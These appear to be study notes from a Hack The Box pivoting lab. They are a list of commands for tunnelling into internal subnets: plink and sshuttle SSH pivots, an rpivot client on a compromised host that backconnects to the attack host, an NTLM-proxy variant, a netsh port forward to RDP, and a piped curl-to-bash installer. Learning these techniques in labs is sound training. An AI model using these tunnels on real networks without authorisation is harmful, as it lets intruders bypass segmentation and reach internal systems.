SSH for Windows: plink.exe
Using Plink.exe
Copiar plink -ssh -D 9050 ubuntu@10.129.15.50
SSH Pivoting with Sshuttle
Copiar b0ySie7e@htb[/htb]$ sudo apt-get install sshuttle
Running sshuttle
Copiar b0ySie7e@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
Traffic Routing through iptables Routes
Copiar b0ySie7e@htb[/htb]$ nmap -v -sV -p3389 172.16.5.19 -A -Pn
Web Server Pivoting with Rpivot
Cloning rpivot
Copiar b0ySie7e@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git
Installing Python2.7
Copiar b0ySie7e@htb[/htb]$ sudo apt-get install python2.7
Alternative Installation of Python2.7
Copiar b0ySie7e@htb[/htb]$ curl https://pyenv.run | bash
b0ySie7e@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ source ~/.bashrc
b0ySie7e@htb[/htb]$ pyenv install 2.7
b0ySie7e@htb[/htb]$ pyenv shell 2.7
Running server.py from the Attack Host
Copiar b0ySie7e@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
Transfering rpivot to the Target
Copiar b0ySie7e@htb[/htb]$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/
Running client.py from Pivot Target
Copiar ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
Backconnecting to server 10.10.14.18 port 9999
Confirming Connection is Established
Copiar New connection from host 10.129.202.64, source port 35226
Browsing to the Target Webserver using Proxychains
Copiar proxychains firefox-esr 172.16.5.135:80
Connecting to a Web Server using HTTP-Proxy & NTLM Auth
Copiar python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
Port Forwarding with Windows Netsh
![[Pasted image 20241019011744.png]]
Using Netsh.exe to Port Forward
Copiar C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
Verifying Port Forward
Copiar C:\Windows\system32> netsh.exe interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.42.198 8080 172.16.5.25 3389